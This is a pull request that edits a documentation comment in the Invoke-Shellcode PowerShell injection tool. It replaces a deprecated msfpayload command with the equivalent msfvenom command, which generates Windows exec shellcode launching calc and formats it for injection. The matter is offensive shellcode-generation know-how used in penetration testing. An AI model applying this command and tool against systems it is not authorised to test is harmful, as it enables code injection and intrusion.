### PR TITLE
Replace depreciated msfpayload

### DIFF
--- a/Invoke-Shellcode
+++ b/Invoke-Shellcode
@@ -17,7 +17,7 @@ Portions of this project was based upon syringe.c v1.2 written by Spencer McInty
 
 PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):
 
-msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- 
+msfvenom -p windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
 
 Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary.
  


### PR DESCRIPTION
msfpayload is a depreciated tool, replaced by msfvenom.
This way, we need to modify line 20 from this:
**msfpayload** windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-

to this:
**msfvenom -p** windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-